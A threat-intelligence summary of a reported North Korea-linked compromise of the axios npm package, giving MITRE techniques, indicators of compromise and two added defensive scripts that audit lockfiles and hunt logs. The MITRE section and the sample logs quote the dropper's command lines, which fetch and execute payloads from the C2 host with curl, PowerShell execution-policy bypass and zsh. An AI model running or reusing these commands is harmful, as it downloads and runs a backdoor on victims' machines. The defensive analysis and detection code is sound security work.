North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack

Google Threat Intelligence Group (GTIG) observed a supply chain compromise of the axios NPM package where a malicious dependency, plain-crypto-js (v4.2.1), delivered an obfuscated dropper (SILKBELL) that installed WAVESHAPER.V2 across Windows, macOS, and Linux. GTIG attributes the campaign to UNC1069, details OS-specific deployment and persistence mechanisms, and recommends immediate remediation including pinning axios versions, auditing for plain-crypto-js, blocking sfrclak[.]com/142.11.206.73, and rotating credentials. #WAVESHAPER.V2 #UNC1069

Keypoints

  • An attacker compromised an axios maintainer account and introduced the malicious dependency plain-crypto-js into axios releases 1.14.1 and 0.30.4 during March 31, 2026.
  • The plain-crypto-js package contains an obfuscated JavaScript dropper (SILKBELL / setup.js, SHA256: e10b1fa8…) that detects the host OS and deploys WAVESHAPER.V2 variants for Windows, macOS, and Linux.
  • The dropper uses the NPM postinstall hook ("postinstall": "node setup.js") for silent background execution and attempts to remove traces by deleting itself and restoring package.json from package.md.
  • Platform-specific payload delivery: Windows uses a copied wt.exe to run a PowerShell script, macOS downloads a Mach-O to /Library/Caches/com.apple.act.mond, and Linux receives a Python backdoor at /tmp/ld.py.
  • WAVESHAPER.V2 is a multi-platform backdoor (C++/PowerShell/Python variants) that beacons to C2 on port 8000 with Base64-encoded JSON and supports commands like rundir, runscript, peinject, and kill.
  • GTIG attributes the activity to UNC1069 based on WAVESHAPER lineage and infrastructure overlap (sfrclak[.]com resolving to 142.11.206.73 and connections through an AstrillVPN node), and urges immediate containment and supply-chain hardening.
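The first three key points describe a dependency-level compromise: a known-bad package pulled in by specific axios releases and executed through a postinstall hook. The following lockfile audit is an added example (it is not GTIG's or the axios project's code) showing how a defender can check a project for those three conditions. Package names and versions are the ones the report gives; the lockfile object is constructed sample input in the lockfileVersion 2/3 shape npm writes to package-lock.json, where npm marks packages that declare install scripts with `hasInstallScript`.

```javascript
// Added example (not GTIG's or the axios project's code): audit an npm
// lockfile for the indicators in the report. Package names and versions
// are the ones the report gives; the lockfile object is constructed input.
const MALICIOUS_DEPS = { "plain-crypto-js": ["4.2.1"] };
const AFFECTED_AXIOS = ["1.14.1", "0.30.4"];

// Constructed lockfileVersion 3 document: entries keyed by node_modules path.
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app", dependencies: { axios: "^1.14.0" } },
    "node_modules/axios": {
      version: "1.14.1",
      dependencies: { "plain-crypto-js": "4.2.1" },
    },
    "node_modules/plain-crypto-js": { version: "4.2.1", hasInstallScript: true },
    "node_modules/follow-redirects": { version: "1.15.6" },
  },
};

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"
function packageNameFromPath(p) {
  const i = p.lastIndexOf("node_modules/");
  return i === -1 ? p : p.slice(i + "node_modules/".length);
}

function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === "") continue; // root project entry, not a dependency
    const name = packageNameFromPath(path);
    const version = entry.version;
    if ((MALICIOUS_DEPS[name] || []).includes(version)) {
      findings.push({ severity: "critical", name, version, reason: "known malicious package" });
    }
    if (name === "axios" && AFFECTED_AXIOS.includes(version)) {
      findings.push({ severity: "critical", name, version, reason: "axios release that pulled in plain-crypto-js" });
    }
    // npm sets hasInstallScript for packages with (pre|post)install hooks.
    // The dropper ran from a postinstall hook, so any dependency that
    // declares one is worth a manual look.
    if (entry.hasInstallScript === true) {
      findings.push({ severity: "review", name, version, reason: "declares an install script" });
    }
  }
  return findings;
}

// Audit the constructed sample; a real package-lock.json can be parsed
// with JSON.parse and passed to auditLockfile in the same way.
for (const f of auditLockfile(SAMPLE_LOCKFILE)) {
  console.log(`[${f.severity}] ${f.name}@${f.version}: ${f.reason}`);
}
```

On the sample this reports two critical findings (axios 1.14.1 and plain-crypto-js 4.2.1) plus a review item for the install script. Lockfile v1 files nest dependencies under `dependencies` rather than a flat `packages` map and would need a different walker.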

MITRE Techniques

  • [T1195] Supply Chain Compromise – The attacker introduced a malicious dependency into a legitimate NPM package, compromising the maintainer account and package releases. ['an attacker introduced a malicious dependency named "plain-crypto-js" into axios NPM releases']
  • [T1059.007] Command and Scripting Interpreter: Node.js – The NPM postinstall hook executes a Node.js dropper (setup.js) to run the malicious deployment logic. ['"postinstall": "node setup.js"']
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Windows execution flow downloads and runs a PowerShell script via curl and a copied Windows Terminal to execute the payload. ['objShell.Run "cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak[.]com:8000/6202033 > %TEMP%\6202033.ps1 … %PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1"']
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – macOS and Linux branches use curl and shell commands (bash/zsh) to download, chmod, and execute native binaries or scripts. ['curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http://sfrclak.com:8000/6202033 && chmod 770 /Library/Caches/com.apple.act.mond && /bin/zsh -c "/Library/Caches/com.apple.act.mond http://sfrclak.com:8000/6202033 &"']
  • [T1059.006] Command and Scripting Interpreter: Python – The Linux execution path downloads and executes a Python backdoor at /tmp/ld.py to provide RAT functionality. ['The script downloads a Python backdoor to /tmp/ld.py using the POST body packages.npm.org/product2.']
  • [T1105] Ingress Tool Transfer – The dropper retrieves platform-specific payloads and secondary components from attacker-controlled servers using HTTP POST and curl. ['It then downloads a PowerShell script via curl … and saves it to the user's AppData Temp directory']
  • [T1071.001] Application Layer Protocol: Web Protocols (HTTP) – WAVESHAPER.V2 beacons and C2 communications occur over HTTP on port 8000 using Base64-encoded JSON and a hard-coded User-Agent. ['the malware beacons to the C2 endpoint over port 8000 at 60-second intervals']
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Windows persistence is achieved by creating a hidden batch file and adding a MicrosoftUpdate Run key under HKCU to execute at logon. ['creating a hidden batch file (%PROGRAMDATA%\system.bat) and adding a new entry named MicrosoftUpdate to HKCU:\Software\Microsoft\Windows\CurrentVersion\Run']
  • [T1027] Obfuscated Files or Information – The dropper uses a custom XOR and Base64 obfuscation routine to hide C2 URLs and execution commands to evade static analysis. ['The script uses a custom XOR and Base64-based string obfuscation routine to conceal the command-and-control (C2 or C&C) URL and host OS execution commands.']
  • [T1070.004] Indicator Removal on Host: File Deletion – The dropper attempts to remove downloaded scripts, delete itself, and restore the original package.json to hide forensic evidence. ['After successfully dropping the secondary payload, setup.js attempts to delete itself and revert the modified package.json to hide forensic traces of the postinstall hook.']

Indicators of Compromise

  • [IP Address] C2 and suspected infrastructure – 142.11.206.73 (WAVESHAPER.V2 C2), 23.254.167.216 (suspected UNC1069 infrastructure)
  • [Domain] C2 endpoints and download URLs – sfrclak[.]com, http://sfrclak[.]com:8000/6202033
  • [File Hash] Notable SHA256 samples for hunting and triage – e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09 (SILKBELL setup.js), fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf (WAVESHAPER.V2 Linux), and 5 more hashes
  • [File Name / Path] Malicious package and staged payload paths – plain-crypto-js-4.2.1.tgz, setup.js (dropper), /Library/Caches/com.apple.act.mond (macOS payload), /tmp/ld.py (Linux payload), system.bat (Windows persistence)
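The MITRE entries above quote the download command lines and describe the C2 channel (HTTP POST to port 8000, Base64-encoded JSON beacons, per-platform `packages.npm.org/productN` POST bodies), and the IoC list gives the hosts and staged paths. The hunting script below is an added example, not GTIG's code, that turns those two sections into detection logic over proxy and process-creation records. Indicator values are quoted from the report; the log lines, their field layout, and the beacon payload are constructed for illustration, and the "Base64 JSON" check is a heuristic that flags any POST body on port 8000 that decodes to a JSON object.

```javascript
// Added example (not GTIG's code): match the report's network and host
// indicators against log lines. Indicator values are from the report; the
// log records below are constructed sample input.
const IOC = {
  hosts: new Set(["sfrclak.com", "142.11.206.73", "23.254.167.216"]),
  c2Port: 8000,
  postBodyPrefix: "packages.npm.org/product", // POST body that selects the payload
  stagedPaths: ["/Library/Caches/com.apple.act.mond", "/tmp/ld.py",
                "system.bat", "6202033.ps1"],
};

// Constructed proxy records. Fields: timestamp client method host port path body
const PROXY_LOG = [
  "2026-03-31T12:00:01Z 10.0.0.5 POST sfrclak.com 8000 /6202033 packages.npm.org/product1",
  // Constructed beacon body: Base64 of a small JSON object.
  "2026-03-31T12:01:01Z 10.0.0.5 POST 142.11.206.73 8000 / " +
    Buffer.from(JSON.stringify({ host: "WS1", user: "dev" })).toString("base64"),
  "2026-03-31T12:02:00Z 10.0.0.9 GET registry.npmjs.org 443 /axios -",
];

// Constructed EDR process-creation command lines, modelled on the quoted ones.
const PROCESS_LOG = [
  "cmd.exe /c curl -s -X POST -d packages.npm.org/product1 http://sfrclak.com:8000/6202033 > %TEMP%\\6202033.ps1",
  "%PROGRAMDATA%\\wt.exe -w hidden -ep bypass -file %TEMP%\\6202033.ps1",
  "curl -o /Library/Caches/com.apple.act.mond -d packages.npm.org/product0 -s http://sfrclak.com:8000/6202033",
  "git status",
];

// True when s is well-formed Base64 whose decoding parses as a JSON object.
function isBase64Json(s) {
  if (!/^[A-Za-z0-9+/]+={0,2}$/.test(s) || s.length % 4 !== 0) return false;
  try {
    const v = JSON.parse(Buffer.from(s, "base64").toString("utf8"));
    return v !== null && typeof v === "object";
  } catch {
    return false;
  }
}

function scanProxyLine(line) {
  const [ts, client, method, host, port, , body] = line.split(" ");
  const reasons = [];
  if (IOC.hosts.has(host)) reasons.push("known C2 host " + host);
  if (Number(port) === IOC.c2Port && method === "POST") {
    if (body.startsWith(IOC.postBodyPrefix)) reasons.push("payload-selection POST body");
    if (isBase64Json(body)) reasons.push("Base64-encoded JSON beacon body");
  }
  return { ts, client, reasons };
}

function scanCommandLine(cmd) {
  const reasons = [];
  for (const h of IOC.hosts) if (cmd.includes(h)) reasons.push("contacts " + h);
  if (cmd.includes("-d " + IOC.postBodyPrefix)) reasons.push("curl POST with payload-selection body");
  for (const p of IOC.stagedPaths) if (cmd.includes(p)) reasons.push("references staged path " + p);
  // The report describes a copied wt.exe under %PROGRAMDATA% running a
  // script with a hidden window and execution-policy bypass.
  if (/wt\.exe\b.*-ep bypass/i.test(cmd) && /PROGRAMDATA/i.test(cmd)) {
    reasons.push("copied wt.exe with -ep bypass");
  }
  return reasons;
}

function hunt(proxyLines = PROXY_LOG, cmdLines = PROCESS_LOG) {
  const hits = [];
  for (const l of proxyLines) {
    const r = scanProxyLine(l);
    if (r.reasons.length) hits.push({ type: "proxy", ...r });
  }
  for (const c of cmdLines) {
    const r = scanCommandLine(c);
    if (r.length) hits.push({ type: "process", cmd: c, reasons: r });
  }
  return hits;
}

console.log(JSON.stringify(hunt(), null, 2));
```

On the constructed input this yields two proxy hits and three process hits; `git status` and the registry.npmjs.org request produce none. The host match alone is the reliable signal; the Base64-JSON heuristic will also fire on legitimate services that post Base64 JSON to port 8000, so it belongs in a hunting query rather than an automated block rule.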


Read more: https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package/